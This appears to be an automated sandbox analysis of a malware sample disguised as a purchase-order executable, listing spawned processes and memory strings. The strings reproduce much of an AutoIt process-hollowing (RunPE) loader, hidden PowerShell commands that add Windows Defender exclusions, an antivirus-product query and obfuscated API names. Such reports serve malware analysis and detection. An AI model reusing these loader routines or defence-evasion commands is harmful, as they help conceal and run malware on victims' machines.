Source | Process information set | Entries (consecutive identical report entries for that source)
C:\Users\user\Desktop\PO3311926.exe | NOOPENFILEERRORBOX | 1
C:\Windows\SysWOW64\wscript.exe | NOOPENFILEERRORBOX | 3
C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin | NOOPENFILEERRORBOX | 5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NOOPENFILEERRORBOX | 31
C:\Users\user\AppData\Roaming\RegSvcs.exe | NOOPENFILEERRORBOX | 17
C:\Users\user\wrse\sdadbtvsh.bin.exe | NOOPENFILEERRORBOX | 5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NOOPENFILEERRORBOX | 18
C:\Users\user\AppData\Roaming\RegSvcs.exe | NOOPENFILEERRORBOX | 34
C:\Users\user\wrse\sdadbtvsh.bin.exe | NOOPENFILEERRORBOX | 5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NOOPENFILEERRORBOX | 18
C:\Users\user\AppData\Roaming\RegSvcs.exe | NOOPENFILEERRORBOX | 17
C:\Users\user\wrse\sdadbtvsh.bin.exe | NOOPENFILEERRORBOX | 5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NOOPENFILEERRORBOX | 18
C:\Users\user\AppData\Roaming\RegSvcs.exe | NOOPENFILEERRORBOX | 17
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")o7 |
memstr_db719c70-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc:/ |
memstr_52d311fb-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifwt |
memstr_1adea4ad-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide) |
memstr_48a30753-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)ckb |
memstr_7865dfaf-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)9hh |
memstr_a469d4bb-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)5z |
memstr_d316f5f9-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)ad |
memstr_fa9672a1-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($var94, 1, "current_user")a( |
memstr_f885897a-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($binbuffer, 1, $binary) |
memstr_2b5dc15c-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 877b273k |
memstr_ccf5875e-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($var93, 1, "0x401fffff")}( |
memstr_4ec5496e-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ppointer = dllstructgetptr($tbinary) |
memstr_bdc18e6f-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $idata = dllstructgetdata($tenries, 1, $i) |
memstr_a2719535-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func _runbinary_iswow64process($handlerpro) |
memstr_f2894a66-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ppeb = dllstructgetdata($tcontext, "ebx") |
memstr_ddfa9af3-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ppeb = dllstructgetdata($tcontext, "rdx") |
memstr_4b39e8ef-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error then return seterror(3, 0, false) |
memstr_a9cd552d-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $idelta = $paddressnew - $paddressold |
memstr_9f8e7e91-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $inumberofentries = ($isizeofblock - 8) / 2 |
memstr_a6350ff9-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss = stringreplace($ssssss, "/", "0") |
memstr_b71ffba6-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 2y$5) |
memstr_42e24c29-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $isizeofrawdata, $ppointertorawdatajwo |
memstr_7347109e-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $pmodule = dllstructgetptr($tmodule) |
memstr_9ba38748-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 029mujyu56dqv8iye)< |
memstr_aaf46e8f-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 1l68fhh2nt3yvw9kku4fnp2 |
memstr_f0264e07-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: okab6221132e57hr423 |
memstr_16c221f0-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: zf43tpn47s51o5454d6 |
memstr_3e6806b2-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 882t0k54i8t9ai5a) |
memstr_27b11c54-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: y0a8yy0hflh848qg |
memstr_dd5cfb6c-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 332ke |
memstr_4d7a73e7-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: k763139foz4_) |
memstr_9d23a726-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 9r9b5quscc091oj0k23 |
memstr_854f03b9-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 5637s4z0o52bvt5u) |
memstr_94ea1ef3-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tenries, $idata, $taddress51 |
memstr_224a0319-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $iflag = 3 + 7 * $fimagex64oy |
memstr_d69592a3-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: zd^}h |
memstr_6a162025-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: i)"k? |
memstr_1bb8f79a-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: td00133 |
memstr_1b950a3e-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: cyx04n6ph39ikt68jl5obfa47w4 |
memstr_cbeae223-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 5p69k4zs5adqm |
memstr_6320f77b-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ~n.a@ |
memstr_c859f5f1-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: sq8hx3s2n81 |
memstr_92d937b8-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: b1t5uu |
memstr_8ffeddff-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 7o2a89423m035xwncaz6uebu05ovgy454k2v |
memstr_78d0121f-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $var106 = dllstructgetptr($var93) |
memstr_a4d413c7-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $var108 = dllstructgetptr($var95) |
memstr_509da4ca-f |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: for $i = 1 to $inumberofsectionse9 |
memstr_fcafe5cf-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error or $acall[0] = -1 then |
memstr_73efa1ad-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func __runpe($binary, $sexemodule) |
memstr_a84fb245-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: kgjjx8k1rj45* |
memstr_359486ee-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 0jv4a145f3j6t12qjlq0g7dob790ff |
memstr_55cf6d1c-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 29563ie7t2142u6 |
memstr_00c957ae-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: __runpe($bbinaryimage, $sexemodule) |
memstr_6b023c3f-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3^lm*# |
memstr_a7880254-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 'ke5r |
memstr_695c8843-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($var93, 6, "1")' |
memstr_08559960-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 58a05f85vrqpzyc70uhll |
memstr_1f220191-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($var93, 7, "0") |
memstr_85ce0bbb-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ^kaxr%d |
memstr_9728b166-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: kiqs* |
memstr_4a8dbbfb-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 0x40fdh57of7cra |
memstr_84ed0d66-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: g61a0z6b9gb |
memstr_afd6d3fd-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 0xs0691ov5oonqn86m456l139x0 |
memstr_2aef0417-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 864rodt |
memstr_b7fa1220-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: i@-?u\ |
memstr_952ea3f6-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: t1c' |
memstr_c583d097-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 4itb9a3497r8wky |
memstr_97a3b755-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: f08s6n9478yz7x |
memstr_514e286f-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: osq^f |
memstr_59ba1039-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $var110 = dllcall("advapi32.dll", "dword", "setentriesinacla", "ulong", "1", "ptr", $var106, "ptr", "0", "ptr", $var108) |
memstr_e62aa5b4-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $var113 = dllcall("advapi32.dll", "dword", "setsecurityinfo", "handle", $var92, "int", "6", "dword", "0x00000004", "dword", "0", "dword", "0", "ptr", dllstructgetdata($var95, 1), "ptr", 0) |
memstr_df0d5134-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if not ubound($var110) then return seterror(4, 0, false) |
memstr_1210144c-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if not ubound($var113) then return seterror(5, 0, false) |
memstr_a6084d8e-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($tmodule, 1, dllstructgetdata($theaders, 1))/$ |
memstr_9b44293f-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $smagic = dllstructgetdata($timage_dos_header, "magic") |
memstr_357ad393-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $var110[0] <> 0 then return seterror(6, $var110[0], false)a$u |
memstr_e2253d7a-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $var113[0] <> 0 then return seterror(7, $var113[0], false) |
memstr_531db188-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $fautoitx64 and _runbinary_iswow64process($handlerpro) thens%c |
memstr_feebff9f-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: t`xvp |
memstr_afdcca5e-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hl0vp |
memstr_9f486204-f |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ~pxp |
memstr_07ece005-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: =ghvp |
memstr_971b4a7e-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifl&_ |
memstr_2ed38096-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: elseq&d |
memstr_7f575c80-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ^v`vp |
memstr_156ece7b-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: #pwp |
memstr_5b87c7e3-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 1 |
memstr_a4c3253c-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 2 |
memstr_51481cb9-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 3 |
memstr_cebd67c4-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif(' |
memstr_f6f04665-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif/' |
memstr_f6f5119e-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 3$' |
memstr_9b07f697-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif=' |
memstr_99f2f96e-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif]'` |
memstr_c1d0d251-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func _runpe($bbinaryimage, $scommandline = '', $sexemodule = @autoitexe) |
memstr_989e5ce3-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tbinary = dllstructcreate("byte[" & binarylen($bbinary) & "]") |
memstr_9411307d-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tstartupinfo = dllstructcreate("dword cbsize;" & "ptr reserved;" & "ptr desktop;" & "ptr title;" & "dword x;" & "dword y;" & "dword xsize;" & "dword ysize;" & "dword xcountchars;" & "dword ycountchars;" & "dword fillattribute;" & "dword flags;" & "word showwindow;" & "word reserved2;" & "ptr reserved2;" & "ptr hstdinput;" & "ptr hstdoutput;" & "ptr hstderror") |
memstr_de68ad62-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tprocess_information = dllstructcreate("ptr process;" & "ptr thread;" & "dword processid;" & "dword threadid") |
memstr_9eba84be-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $acall = dllcall("kernel32.dll", "bool", "createprocessw", "wstr", $sexemodule, "wstr", $scommandline, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", dllstructgetptr($tstartupinfo), "ptr", dllstructgetptr($tprocess_information)) |
memstr_bcde8035-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0) |
memstr_78bfe17c-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ivirtualaddress, $isizeofblock, $inumberofentries ! |
memstr_5a1fc97a-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tmagic = dllstructcreate("word magic;", $ppointer) |
memstr_afb80f61-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0) " |
memstr_bec0b261-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0)@"| |
memstr_8c20e9c1-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func _runbinary_unmapviewofsection($handlerpro, $paddress) |
memstr_2035a622-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $handlerpro = dllstructgetdata($tprocess_information, "process") |
memstr_2b1a6f5d-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)p |
memstr_42f0e62c-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $tcontext = dllstructcreate("dword con" & "text" & "flags;" & "dword dr0; dword dr1; dword dr2; dword dr3; dword dr6; dword dr7;" & "dword controlword; dword statusword; dword tagword; dword erroroffset; dword errorselector; dword dataoffset; dword dataselector; byte registerarea[80]; dword cr0npxstate;" & "dword seggs; dword segfs; dword seges; dword segds;" & "dword edi; dword esi; dword ebx; dword edx; dword ecx; dword eax;" & "dword ebp; dword eip; dword segcs; dword eflags; dword esp; dword segss;" & "byte extendedregisters[512]")"u |
memstr_b928f963-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $timage_dos_header = dllstructcreate("char magic[2];" & "word bytesonlastpage;" & "word pages;" & "word relocations;" & "word sizeofheader;" & "word minimumextra;" & "word maximumextra;" & "word ss;" & "word sp;" & "word checksum;" & "word ip;" & "word cs;" & "word relocation;" & "word overlay;" & "char reserved[8];" & "word oemidentifier;" & "word oeminformation;" & "char reserved2[20];" & "dword addressofnewexeheader", $ppointer)64 |
memstr_e448c2a7-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: eptiontorip; ui |
memstr_223c5176-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $tcontext = dllstructcreate("align 16; uint64 p1home; uint64 p2home; uint64 p3home; uint64 p4home; uint64 p5home; uint64 p6home;" & "dword cont" & "ext" & "flags; dword mxcsr;" & "word segcs; word segds; word seges; word segfs; word seggs; word segss; dword eflags;" & "uint64 dr0; uint64 dr1; uint64 dr2; uint64 dr3; uint64 dr6; uint64 dr7;" & "uint64 rax; uint64 rcx; uint64 rdx; uint64 rbx; uint64 rsp; uint64 rbp; uint64 rsi; uint64 rdi; uint64 r8; uint64 r9; uint64 r10; uint64 r11; uint64 r12; uint64 r13; uint64 r14; uint64 r15;" & "uint64 rip;" & "uint64 header[4]; uint64 legacy[16]; uint64 xmm0[2]; uint64 xmm1[2]; uint64 xmm2[2]; uint64 xmm3[2]; uint64 xmm4[2]; uint64 xmm5[2]; uint64 xmm6[2]; uint64 xmm7[2]; uint64 xmm8[2]; uint64 xmm9[2]; uint64 xmm10[2]; uint64 xmm11[2]; uint64 xmm12[2]; uint64 xmm13[2]; uint64 xmm14[2]; uint64 xmm15[2];" & "uint64 vectorregister[52]; uint64 vectorcontrol;" & "uint64 debugcontrol; uint64 lastbranchtorip; uint64 lastbranchfromrip; uint64 lastexceptiontorip; uint64 lastexceptionfromrip") |
memstr_4af418ca-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0) |
memstr_68895962-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $timage_nt_signature = dllstructcreate("dword signature", $ppointer) |
memstr_92c54b9c-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if dllstructgetdata($timage_nt_signature, "signature") <> 17744 then |
memstr_064ee42e-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $timage_file_header = dllstructcreate("word machine;" & "word numberofsections;" & "dword timedatestamp;" & "dword pointertosymboltable;" & "dword numberofsymbols;" & "word sizeofoptionalheader;" & "word characteristics", $ppointer) |
memstr_49c2e699-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $inumberofsections = dllstructgetdata($timage_file_header, "numberofsections") |
memstr_4f62f5b1-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "dword baseofdata;" & "dword imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "dword sizeofstackreserve;" & "dword sizeofstackcommit;" & "dword sizeofheapreserve;" & "dword sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer) |
memstr_b5e6a46b-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
